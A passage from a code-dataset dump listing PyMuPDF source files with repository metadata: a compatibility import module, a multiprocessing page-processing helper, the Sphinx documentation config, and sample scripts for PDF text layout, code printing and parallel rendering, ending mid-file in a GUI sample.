id int64 0 458k | file_name stringlengths 4 119 | file_path stringlengths 14 227 | content stringlengths 24 9.96M | size int64 24 9.96M | language stringclasses 1 value | extension stringclasses 14 values | total_lines int64 1 219k | avg_line_length float64 2.52 4.63M | max_line_length int64 5 9.91M | alphanum_fraction float64 0 1 | repo_name stringlengths 7 101 | repo_stars int64 100 139k | repo_forks int64 0 26.4k | repo_open_issues int64 0 2.27k | repo_license stringclasses 12 values | repo_extraction_date stringclasses 433 values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
21,300 | fitz___init__.py | pymupdf_PyMuPDF/src/fitz___init__.py | # pylint: disable=wildcard-import,unused-import,unused-wildcard-import
from pymupdf import *
from pymupdf import _as_fz_document
from pymupdf import _as_fz_page
from pymupdf import _as_pdf_document
from pymupdf import _as_pdf_page
from pymupdf import _log_items
from pymupdf import _log_items_active
from pymupdf import _log_items_clear
from pymupdf import __version__
from pymupdf import __doc__
| 397 | Python | .py | 11 | 35.090909 | 70 | 0.818653 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,301 | _apply_pages.py | pymupdf_PyMuPDF/src/_apply_pages.py | import multiprocessing
import os
import time
import pymupdf
# Support for concurrent processing of document pages.
#
class _worker_State:
pass
_worker_state = _worker_State()
def _worker_init(
path,
initfn,
initfn_args,
initfn_kwargs,
pagefn,
pagefn_args,
pagefn_kwargs,
stats,
):
# pylint: disable=attribute-defined-outside-init
_worker_state.path = path
_worker_state.pagefn = pagefn
_worker_state.pagefn_args = pagefn_args
_worker_state.pagefn_kwargs = pagefn_kwargs
_worker_state.stats = stats
_worker_state.document = None
if initfn:
initfn(*initfn_args, **initfn_kwargs)
def _stats_write(t, label):
t = time.time() - t
if t >= 0.1:
pymupdf.log(f'{os.getpid()=}: {t:2f}s: {label}.')
def _worker_fn(page_number):
# Create Document from filename if we haven't already done so.
if not _worker_state.document:
if _worker_state.stats:
t = time.time()
_worker_state.document = pymupdf.Document(_worker_state.path) # pylint: disable=attribute-defined-outside-init
if _worker_state.stats:
_stats_write(t, 'pymupdf.Document()')
if _worker_state.stats:
t = time.time()
page = _worker_state.document[page_number]
if _worker_state.stats:
_stats_write(t, '_worker_state.document[page_number]')
if _worker_state.stats:
t = time.time()
ret = _worker_state.pagefn(
page,
*_worker_state.pagefn_args,
**_worker_state.pagefn_kwargs,
)
if _worker_state.stats:
_stats_write(t, '_worker_state.pagefn()')
return ret
def _multiprocessing(
path,
pages,
pagefn,
pagefn_args,
pagefn_kwargs,
initfn,
initfn_args,
initfn_kwargs,
concurrency,
stats,
):
#print(f'_worker_mp(): {concurrency=}', flush=1)
with multiprocessing.Pool(
concurrency,
_worker_init,
(
path,
initfn, initfn_args, initfn_kwargs,
pagefn, pagefn_args, pagefn_kwargs,
stats,
),
) as pool:
result = pool.map_async(_worker_fn, pages)
return result.get()
def _fork(
path,
pages,
pagefn,
pagefn_args,
pagefn_kwargs,
initfn,
initfn_args,
initfn_kwargs,
concurrency,
stats,
):
verbose = 0
if concurrency is None:
concurrency = multiprocessing.cpu_count()
# We write page numbers to `queue_down` and read `(page_num, text)` from
# `queue_up`. Workers each repeatedly read the next available page number
# from `queue_down`, extract the text and write it onto `queue_up`.
#
# This is better than pre-allocating a subset of pages to each worker
# because it ensures there will never be idle workers until we are near the
# end with fewer pages left than workers.
#
queue_down = multiprocessing.Queue()
queue_up = multiprocessing.Queue()
def childfn():
document = None
if verbose:
pymupdf.log(f'{os.getpid()=}: {initfn=} {initfn_args=}')
_worker_init(
path,
initfn,
initfn_args,
initfn_kwargs,
pagefn,
pagefn_args,
pagefn_kwargs,
stats,
)
while 1:
if verbose:
pymupdf.log(f'{os.getpid()=}: calling get().')
page_num = queue_down.get()
if verbose:
pymupdf.log(f'{os.getpid()=}: {page_num=}.')
if page_num is None:
break
try:
if not document:
if stats:
t = time.time()
document = pymupdf.Document(path)
if stats:
_stats_write(t, 'pymupdf.Document(path)')
if stats:
t = time.time()
page = document[page_num]
if stats:
_stats_write(t, 'document[page_num]')
if verbose:
pymupdf.log(f'{os.getpid()=}: {_worker_state=}')
if stats:
t = time.time()
ret = pagefn(
page,
*_worker_state.pagefn_args,
**_worker_state.pagefn_kwargs,
)
if stats:
_stats_write(t, f'{page_num=} pagefn()')
except Exception as e:
if verbose: pymupdf.log(f'{os.getpid()=}: exception {e=}')
ret = e
if verbose:
pymupdf.log(f'{os.getpid()=}: sending {page_num=} {ret=}')
queue_up.put( (page_num, ret) )
error = None
pids = list()
try:
# Start child processes.
if stats:
t = time.time()
for i in range(concurrency):
p = os.fork() # pylint: disable=no-member
if p == 0:
# Child process.
try:
try:
childfn()
except Exception as e:
pymupdf.log(f'{os.getpid()=}: childfn() => {e=}')
raise
finally:
if verbose:
pymupdf.log(f'{os.getpid()=}: calling os._exit(0)')
os._exit(0)
pids.append(p)
if stats:
_stats_write(t, 'create child processes')
# Send page numbers.
if stats:
t = time.time()
if verbose:
pymupdf.log(f'Sending page numbers.')
for page_num in range(len(pages)):
queue_down.put(page_num)
if stats:
_stats_write(t, 'Send page numbers')
# Collect results. We give up if any worker sends an exception instead
# of text, but this hasn't been tested.
ret = [None] * len(pages)
for i in range(len(pages)):
page_num, text = queue_up.get()
if verbose:
pymupdf.log(f'{page_num=} {len(text)=}')
assert ret[page_num] is None
if isinstance(text, Exception):
if not error:
error = text
break
ret[page_num] = text
# Close queue. This should cause exception in workers and terminate
# them, but on macos-arm64 this does not seem to happen, so we also
# send None, which makes workers terminate.
for i in range(concurrency):
queue_down.put(None)
if verbose: pymupdf.log(f'Closing queues.')
queue_down.close()
if error:
raise error
if verbose:
pymupdf.log(f'After concurrent, returning {len(ret)=}')
return ret
finally:
# Join all child processes.
if stats:
t = time.time()
for pid in pids:
if verbose:
pymupdf.log(f'waiting for {pid=}.')
e = os.waitpid(pid, 0)
if verbose:
pymupdf.log(f'{pid=} => {e=}')
if stats:
_stats_write(t, 'Join all child proceses')
| 7,569 | Python | .py | 225 | 21.866667 | 120 | 0.509275 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,302 | conf.py | pymupdf_PyMuPDF/docs/conf.py | # -*- coding: utf-8 -*-
#
import re
import sys
import os
import datetime
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath("."))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = "4.2.0"
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
# extensions = ["sphinx.ext.autodoc", "sphinx.ext.coverage", "sphinx.ext.ifconfig"]
extensions = ['sphinx_copybutton','notfound.extension']
# rst2pdf is not available on OpenBSD.
if hasattr(os, "uname") and os.uname()[0] != "OpenBSD":
extensions.append("rst2pdf.pdfbuilder")
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix of source filenames.
source_suffix = ".rst"
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
root_doc = "index"
# General information about the project.
project = "PyMuPDF"
thisday = datetime.date.today()
copyright = "2015-" + str(thisday.year) + ", Artifex"
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The full version, including alpha/beta/rc tags.
_path = os.path.abspath(f'{__file__}/../../src/__init__.py')
with open(_path) as f:
for line in f:
match = re.search('pymupdf_version = "([0-9][.][0-9]+[.][0-9]+(rc[0-9]+)?)"', line)
if match:
release = match.group(1)
print(f'{__file__}: setting version from {_path}: {release}')
break
else:
raise Exception(f'Failed to find `VersionBind = ...` in {_path}')
# The short X.Y version
version = release
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ["_build", "build"]
# The reST default role (used for this markup: `text`) to use for all
# documents.
default_role = "any"
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# A list of ignored prefixes for module index sorting.
modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
keep_warnings = False
# Localization vars
gettext_uuid = True
gettext_compact = False
locale_dirs = ["locales"]
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "furo"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
"canonical_url": "",
"logo_only": False,
"display_version": True,
"prev_next_buttons_location": None,
# Toc options
"collapse_navigation": True,
"sticky_navigation": True,
"navigation_depth": 4,
"includehidden": True,
"titles_only": False,
}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = "_static/PyMuPDF.ico"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
html_theme_options = {
"light_logo": "sidebar-logo-dark.svg",
"dark_logo": "sidebar-logo-light.svg",
}
# A list of CSS files. The entry must be a filename string or a tuple containing
# the filename string and the attributes dictionary. The filename must be
# relative to the html_static_path, or a full URI
html_css_files = ["custom.css"]
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = "%d. %b %Y"
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = False
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
html_additional_pages = {}
# If false, no module index is generated.
html_domain_indices = True
# If false, no index is generated.
html_use_index = True
# If true, the index is split into individual pages for each letter.
html_split_index = True
# If true, links to the reST sources are added to the pages.
html_show_sourcelink = True
html_sourcelink_suffix = ".rst"
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
html_show_sphinx = False
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
html_use_opensearch = ""
# This is the file name suffix for HTML files (e.g. ".xhtml").
html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = "PyMuPDF"
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# "fontpkg": r"\usepackage[sfdefault]{ClearSans} \usepackage[T1]{fontenc}"
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [("index", "PyMuPDF.tex", "PyMuPDF Documentation", "Artifex", "manual")]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
latex_logo = "images/pymupdf-logo.png"
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = True
# latex_use_xindy = True
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
latex_domain_indices = True
# -- Options for PDF output --------------------------------------------------
# Grouping the document tree into PDF files. List of tuples
# (source start file, target name, title, author).
pdf_documents = [("index", "PyMuPDF", "PyMuPDF Manual", "Artifex")]
# A comma-separated list of custom stylesheets. Example:
# pdf_stylesheets = ["sphinx", "bahnschrift", "a4"]
# Create a compressed PDF
pdf_compressed = True
# A colon-separated list of folders to search for fonts. Example:
# pdf_font_path=['/usr/share/fonts', '/usr/share/texmf-dist/fonts/']
# Language to be used for hyphenation support
pdf_language = "en_US"
# If false, no index is generated.
pdf_use_index = True
# If false, no modindex is generated.
pdf_use_modindex = True
# If false, no coverpage is generated.
pdf_use_coverpage = True
pdf_break_level = 2
pdf_verbosity = 0
pdf_invariant = True
| 8,979 | Python | .py | 207 | 41.449275 | 91 | 0.721048 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,303 | quickfox-image-no-go.py | pymupdf_PyMuPDF/docs/samples/quickfox-image-no-go.py | """
This is a demo script using PyMuPDF's Story class to output text as a PDF with
a two-column page layout.
The script demonstrates the following features:
* Layout text around images of an existing ("target") PDF.
* Based on a few global parameters, areas on each page are identified, that
can be used to receive text layouted by a Story.
* These global parameters are not stored anywhere in the target PDF and
must therefore be provided in some way.
- The width of the border(s) on each page.
- The fontsize to use for text. This value determines whether the provided
text will fit in the empty spaces of the (fixed) pages of target PDF. It
cannot be predicted in any way. The script ends with an exception if
target PDF has not enough pages, and prints a warning message if not all
pages receive at least some text. In both cases, the FONTSIZE value
can be changed (a float value).
- Use of a 2-column page layout for the text.
* The layout creates a temporary (memory) PDF. Its produced page content
(the text) is used to overlay the corresponding target page. If text
requires more pages than are available in target PDF, an exception is raised.
If not all target pages receive at least some text, a warning is printed.
* The script reads "image-no-go.pdf" in its own folder. This is the "target" PDF.
It contains 2 pages with each 2 images (from the original article), which are
positioned at places that create a broad overall test coverage. Otherwise the
pages are empty.
* The script produces "quickfox-image-no-go.pdf" which contains the original pages
and image positions, but with the original article text laid out around them.
Note:
--------------
This script version uses just image positions to derive "No-Go areas" for
layouting the text. Other PDF objects types are detectable by PyMuPDF and may
be taken instead or in addition, without influencing the layouting.
The following are candidates for other such "No-Go areas". Each can be detected
and located by PyMuPDF:
* Annotations
* Drawings
* Existing text
--------------
The text and images are taken from the somewhat modified Wikipedia article
https://en.wikipedia.org/wiki/The_quick_brown_fox_jumps_over_the_lazy_dog.
--------------
"""
import io
import os
import zipfile
import pymupdf
thisdir = os.path.dirname(os.path.abspath(__file__))
myzip = zipfile.ZipFile(os.path.join(thisdir, "quickfox.zip"))
docname = os.path.join(thisdir, "image-no-go.pdf") # "no go" input PDF file name
outname = os.path.join(thisdir, "quickfox-image-no-go.pdf") # output PDF file name
BORDER = 36 # global parameter
FONTSIZE = 12.5 # global parameter
COLS = 2 # number of text columns, global parameter
def analyze_page(page):
"""Compute MediaBox and rectangles on page that are free to receive text.
Notes:
Assume a BORDER around the page, make 2 columns of the resulting
sub-rectangle and extract the rectangles of all images on page.
For demo purposes, the image rectangles are taken as "NO-GO areas"
on the page when writing text with the Story.
The function returns free areas for each of the columns.
Returns:
(page.number, mediabox, CELLS), where CELLS is a list of free cells.
"""
prect = page.rect # page rectangle - will be our MEDIABOX later
where = prect + (BORDER, BORDER, -BORDER, -BORDER)
TABLE = pymupdf.make_table(where, rows=1, cols=COLS)
# extract rectangles covered by images on this page
IMG_RECTS = sorted( # image rects on page (sort top-left to bottom-right)
[pymupdf.Rect(item["bbox"]) for item in page.get_image_info()],
key=lambda b: (b.y1, b.x0),
)
def free_cells(column):
"""Return free areas in this column."""
free_stripes = [] # y-value pairs wrapping a free area stripe
# intersecting images: block complete intersecting column stripe
col_imgs = [(b.y0, b.y1) for b in IMG_RECTS if abs(b & column) > 0]
s_y0 = column.y0 # top y-value of column
for y0, y1 in col_imgs: # an image stripe
if y0 > s_y0 + FONTSIZE: # image starts below last free btm value
free_stripes.append((s_y0, y0)) # store as free stripe
s_y0 = y1 # start of next free stripe
if s_y0 + FONTSIZE < column.y1: # enough room to column bottom
free_stripes.append((s_y0, column.y1))
if free_stripes == []: # covers "no image in this column"
free_stripes.append((column.y0, column.y1))
# make available cells of this column
CELLS = [pymupdf.Rect(column.x0, y0, column.x1, y1) for (y0, y1) in free_stripes]
return CELLS
# collection of available Story rectangles on page
CELLS = []
for i in range(COLS):
CELLS.extend(free_cells(TABLE[0][i]))
return page.number, prect, CELLS
HTML = myzip.read("quickfox.html").decode()
# --------------------------------------------------------------
# Make the Story object
# --------------------------------------------------------------
story = pymupdf.Story(HTML)
# modify the DOM somewhat
body = story.body # access HTML body
body.set_properties(font="sans-serif") # and give it our font globally
# modify certain nodes
para = body.find("p", None, None) # find relevant nodes (here: paragraphs)
while para != None:
para.set_properties( # method MUST be used for existing nodes
indent=15,
fontsize=FONTSIZE,
)
para = para.find_next("p", None, None)
# we remove all image references, because the target PDF already has them
img = body.find("img", None, None)
while img != None:
next_img = img.find_next("img", None, None)
img.remove()
img = next_img
page_info = {} # contains MEDIABOX and free CELLS per page
doc = pymupdf.open(docname)
for page in doc:
pno, mediabox, cells = analyze_page(page)
page_info[pno] = (mediabox, cells)
doc.close() # close target PDF for now - re-open later
fileobject = io.BytesIO() # let DocumentWriter write to memory
writer = pymupdf.DocumentWriter(fileobject) # define output writer
more = 1 # stop if this ever becomes zero
pno = 0 # count output pages
while more: # loop until all HTML text has been written
try:
MEDIABOX, CELLS = page_info[pno]
except KeyError: # too much text space required: reduce fontsize?
raise ValueError("text does not fit on target PDF")
dev = writer.begin_page(MEDIABOX) # prepare a new output page
for cell in CELLS: # iterate over free cells on this page
if not more: # need to check this for every cell
continue
more, _ = story.place(cell)
story.draw(dev)
writer.end_page() # finish the PDF page
pno += 1
writer.close() # close DocumentWriter output
# Re-open writer output, read its pages and overlay target pages with them.
# The generated pages have same dimension as their targets.
src = pymupdf.open("pdf", fileobject)
doc = pymupdf.open(doc.name)
for page in doc: # overlay every target page with the prepared text
if page.number >= src.page_count:
print(f"Text only uses {src.page_count} target pages!")
continue # story did not need all target pages?
# overlay target page
page.show_pdf_page(page.rect, src, page.number)
# DEBUG start --- draw the text rectangles
# mb, cells = page_info[page.number]
# for cell in cells:
# page.draw_rect(cell, color=(1, 0, 0))
# DEBUG stop ---
doc.ez_save(outname)
| 7,719 | Python | .py | 156 | 43.865385 | 90 | 0.678224 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,304 | code-printer.py | pymupdf_PyMuPDF/docs/samples/code-printer.py | """
Demo script PyMuPDF Story class
-------------------------------
Read the Python sources in the script directory and create a PDF of all their
source codes.
The following features are included as a specialty:
1. HTML source for pymupdf.Story created via Python API exclusively
2. Separate Story objects for page headers and footers
3. Use of HTML "id" elements for identifying source start pages
4. Generate a Table of Contents pointing to source file starts. This
- uses the new Stoy callback feature
- uses Story also for making the TOC page(s)
"""
import io
import os
import time
import pymupdf
THISDIR = os.path.dirname(os.path.abspath(__file__))
TOC = [] # this will contain the TOC list items
CURRENT_ID = "" # currently processed filename - stored by recorder func
MEDIABOX = pymupdf.paper_rect("a4-l") # chosen page size
WHERE = MEDIABOX + (36, 50, -36, -36) # sub rectangle for source content
# location of the header rectangle
HDR_WHERE = (36, 5, MEDIABOX.width - 36, 40)
# location of the footer rectangle
FTR_WHERE = (36, MEDIABOX.height - 36, MEDIABOX.width - 36, MEDIABOX.height)
def recorder(elpos):
"""Callback function invoked during story.place().
This function generates / collects all TOC items and updates the value of
CURRENT_ID - which is used to update the footer line of each page.
"""
global TOC, CURRENT_ID
if not elpos.open_close & 1: # only consider "open" items
return
level = elpos.heading
y0 = elpos.rect[1] # top of written rectangle (use for TOC)
if level > 0: # this is a header (h1 - h6)
pno = elpos.page + 1 # the page number
TOC.append(
(
level,
elpos.text,
elpos.page + 1,
y0,
)
)
return
CURRENT_ID = elpos.id if elpos.id else "" # update for footer line
return
def header_story(text):
"""Make the page header"""
header = pymupdf.Story()
hdr_body = header.body
hdr_body.add_paragraph().set_properties(
align=pymupdf.TEXT_ALIGN_CENTER,
bgcolor="#eee",
font="sans-serif",
bold=True,
fontsize=12,
color="green",
).add_text(text)
return header
def footer_story(text):
"""Make the page footer"""
footer = pymupdf.Story()
ftr_body = footer.body
ftr_body.add_paragraph().set_properties(
bgcolor="#eee",
align=pymupdf.TEXT_ALIGN_CENTER,
color="blue",
fontsize=10,
font="sans-serif",
).add_text(text)
return footer
def code_printer(outfile):
"""Output the generated PDF to outfile."""
global MAX_TITLE_LEN
where = +WHERE
writer = pymupdf.DocumentWriter(outfile, "")
print_time = time.strftime("%Y-%m-%d %H:%M:%S (%z)")
thispath = os.path.abspath(os.curdir)
basename = os.path.basename(thispath)
story = pymupdf.Story()
body = story.body
body.set_properties(font="sans-serif")
text = f"Python sources in folder '{THISDIR}'"
body.add_header(1).add_text(text) # the only h1 item in the story
files = os.listdir(THISDIR) # list / select Python files in our directory
i = 1
for code_file in files:
if not code_file.endswith(".py"):
continue
# read Python file source
fileinput = open(os.path.join(THISDIR, code_file), "rb")
text = fileinput.read().decode()
fileinput.close()
# make level 2 header
hdr = body.add_header(2)
if i > 1:
hdr.set_pagebreak_before()
hdr.add_text(f"{i}. Listing of file '{code_file}'")
# Write the file code
body.add_codeblock().set_bgcolor((240, 255, 210)).set_color("blue").set_id(
code_file
).set_fontsize(10).add_text(text)
# Indicate end of a source file
body.add_paragraph().set_align(pymupdf.TEXT_ALIGN_CENTER).add_text(
f"---------- End of File '{code_file}' ----------"
)
i += 1 # update file counter
i = 0
while True:
i += 1
device = writer.begin_page(MEDIABOX)
# create Story objects for header, footer and the rest.
header = header_story(f"Python Files in '{THISDIR}'")
hdr_ok, _ = header.place(HDR_WHERE)
if hdr_ok != 0:
raise ValueError("header does not fit")
header.draw(device, None)
# --------------------------------------------------------------
# Write the file content.
# --------------------------------------------------------------
more, filled = story.place(where)
# Inform the callback function
# Args:
# recorder: the Python function to call
# {}: dictionary containing anything - we pass the page number
story.element_positions(recorder, {"page": i - 1})
story.draw(device, None)
# --------------------------------------------------------------
# Make / write page footer.
# We MUST have a paragraph b/o background color / alignment
# --------------------------------------------------------------
if CURRENT_ID:
text = f"File '{CURRENT_ID}' printed at {print_time}{chr(160)*5}{'-'*10}{chr(160)*5}Page {i}"
else:
text = f"Printed at {print_time}{chr(160)*5}{'-'*10}{chr(160)*5}Page {i}"
footer = footer_story(text)
# write the page footer
ftr_ok, _ = footer.place(FTR_WHERE)
if ftr_ok != 0:
raise ValueError("footer does not fit")
footer.draw(device, None)
writer.end_page()
if more == 0:
break
writer.close()
if __name__ == "__main__" or os.environ.get('PYTEST_CURRENT_TEST'):
fileptr1 = io.BytesIO()
t0 = time.perf_counter()
code_printer(fileptr1) # make the PDF
t1 = time.perf_counter()
doc = pymupdf.open("pdf", fileptr1)
old_count = doc.page_count
# -----------------------------------------------------------------------------
# Post-processing step to make / insert the toc
# This also works using pymupdf.Story:
# - make a new PDF in memory which contains pages with the TOC text
# - add these TOC pages to the end of the original file
# - search item text on the inserted pages and cover each with a PDF link
# - move the TOC pages to the front of the document
# -----------------------------------------------------------------------------
story = pymupdf.Story()
body = story.body
body.add_header(1).set_font("sans-serif").add_text("Table of Contents")
# prefix TOC with an entry pointing to this page
TOC.insert(0, [1, "Table of Contents", old_count + 1, 36])
for item in TOC[1:]: # write the file name headers as TOC lines
body.add_paragraph().set_font("sans-serif").add_text(
item[1] + f" - ({item[2]})"
)
fileptr2 = io.BytesIO() # put TOC pages to a separate PDF initially
writer = pymupdf.DocumentWriter(fileptr2)
i = 1
more = 1
while more:
device = writer.begin_page(MEDIABOX)
header = header_story(f"Python Files in '{THISDIR}'")
# write the page header
hdr_ok, _ = header.place(HDR_WHERE)
header.draw(device, None)
more, filled = story.place(WHERE)
story.draw(device, None)
footer = footer_story(f"TOC-{i}") # separate page numbering scheme
# write the page footer
ftr_ok, _ = footer.place(FTR_WHERE)
footer.draw(device, None)
writer.end_page()
i += 1
writer.close()
doc2 = pymupdf.open("pdf", fileptr2) # open TOC pages as another PDF
doc.insert_pdf(doc2) # and append to the main PDF
new_range = range(old_count, doc.page_count) # the TOC page numbers
pages = [doc[i] for i in new_range] # these are the TOC pages within main PDF
for item in TOC: # search for TOC item text to get its rectangle
for page in pages:
rl = page.search_for(item[1], flags=pymupdf.TEXTFLAGS_SEARCH)
if rl != []: # this text must be on next page
break
else:
assert 0, f'Cannot find {item[1]=} in {len(pages)=}.'
rect = rl[0] # rectangle of TOC item text
link = { # make a link from it
"kind": pymupdf.LINK_GOTO,
"from": rect,
"to": pymupdf.Point(0, item[3]),
"page": item[2] - 1,
}
page.insert_link(link)
# insert the TOC in the main PDF
doc.set_toc(TOC)
# move all the TOC pages to the desired place (1st page here)
for i in new_range:
doc.move_page(doc.page_count - 1, 0)
doc.ez_save(__file__.replace(".py", ".pdf"))
| 8,752 | Python | .py | 216 | 33.375 | 105 | 0.583441 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,305 | simple-grid.py | pymupdf_PyMuPDF/docs/samples/simple-grid.py | import pymupdf
MEDIABOX = pymupdf.paper_rect("letter") # output page format: Letter
GRIDSPACE = pymupdf.Rect(100, 100, 400, 400)
GRID = pymupdf.make_table(GRIDSPACE, rows=2, cols=2)
CELLS = [GRID[i][j] for i in range(2) for j in range(2)]
text_table = ("A", "B", "C", "D")
writer = pymupdf.DocumentWriter(__file__.replace(".py", ".pdf")) # create the writer
device = writer.begin_page(MEDIABOX) # make new page
for i, text in enumerate(text_table):
story = pymupdf.Story(em=1)
body = story.body
with body.add_paragraph() as para:
para.set_bgcolor("#ecc")
para.set_pagebreak_after() # fills whole cell with bgcolor
para.set_align("center")
para.set_fontsize(16)
para.add_text(f"\n\n\n{text}")
story.place(CELLS[i])
story.draw(device)
del story
writer.end_page() # finish page
writer.close() # close output file
| 884 | Python | .py | 22 | 36.090909 | 85 | 0.668998 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,306 | multiprocess-render.py | pymupdf_PyMuPDF/docs/samples/multiprocess-render.py | """
Demonstrate the use of multiprocessing with PyMuPDF.
Depending on the number of CPUs, the document is divided in page ranges.
Each range is then worked on by one process.
The type of work would typically be text extraction or page rendering. Each
process must know where to put its results, because this processing pattern
does not include inter-process communication or data sharing.
Compared to sequential processing, speed improvements in range of 100% (ie.
twice as fast) or better can be expected.
"""
from __future__ import print_function, division
import sys
import os
import time
from multiprocessing import Pool, cpu_count
import pymupdf
# choose a version specific timer function (bytes == str in Python 2)
mytime = time.clock if str is bytes else time.perf_counter
def render_page(vector):
"""Render a page range of a document.
Notes:
The PyMuPDF document cannot be part of the argument, because that
cannot be pickled. So we are being passed in just its filename.
This is no performance issue, because we are a separate process and
need to open the document anyway.
Any page-specific function can be processed here - rendering is just
an example - text extraction might be another.
The work must however be self-contained: no inter-process communication
or synchronization is possible with this design.
Care must also be taken with which parameters are contained in the
argument, because it will be passed in via pickling by the Pool class.
So any large objects will increase the overall duration.
Args:
vector: a list containing required parameters.
"""
# recreate the arguments
idx = vector[0] # this is the segment number we have to process
cpu = vector[1] # number of CPUs
filename = vector[2] # document filename
mat = vector[3] # the matrix for rendering
doc = pymupdf.open(filename) # open the document
num_pages = doc.page_count # get number of pages
# pages per segment: make sure that cpu * seg_size >= num_pages!
seg_size = int(num_pages / cpu + 1)
seg_from = idx * seg_size # our first page number
seg_to = min(seg_from + seg_size, num_pages) # last page number
for i in range(seg_from, seg_to): # work through our page segment
page = doc[i]
# page.get_text("rawdict") # use any page-related type of work here, eg
pix = page.get_pixmap(alpha=False, matrix=mat)
# store away the result somewhere ...
# pix.save("p-%i.png" % i)
print("Processed page numbers %i through %i" % (seg_from, seg_to - 1))
if __name__ == "__main__":
t0 = mytime() # start a timer
filename = sys.argv[1]
mat = pymupdf.Matrix(0.2, 0.2) # the rendering matrix: scale down to 20%
cpu = cpu_count()
# make vectors of arguments for the processes
vectors = [(i, cpu, filename, mat) for i in range(cpu)]
print("Starting %i processes for '%s'." % (cpu, filename))
pool = Pool() # make pool of 'cpu_count()' processes
pool.map(render_page, vectors, 1) # start processes passing each a vector
t1 = mytime() # stop the timer
print("Total time %g seconds" % round(t1 - t0, 2))
| 3,243 | Python | .py | 65 | 44.876923 | 80 | 0.69921 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,307 | multiprocess-gui.py | pymupdf_PyMuPDF/docs/samples/multiprocess-gui.py | """
Created on 2019-05-01
@author: yinkaisheng@live.com
@copyright: 2019 yinkaisheng@live.com
@license: GNU AFFERO GPL 3.0
Demonstrate the use of multiprocessing with PyMuPDF
-----------------------------------------------------
This example shows some more advanced use of multiprocessing.
The main process show a Qt GUI and establishes a 2-way communication with
another process, which accesses a supported document.
"""
import os
import sys
import time
import multiprocessing as mp
import queue
import pymupdf
''' PyQt and PySide namespace unifier shim
https://www.pythonguis.com/faq/pyqt6-vs-pyside6/
simple "if 'PyQt6' in sys.modules:" test fails for me, so the more complex pkgutil use
overkill for most people who might have one or the other, why both?
'''
from pkgutil import iter_modules
def module_exists(module_name):
return module_name in (name for loader, name, ispkg in iter_modules())
if module_exists("PyQt6"):
# PyQt6
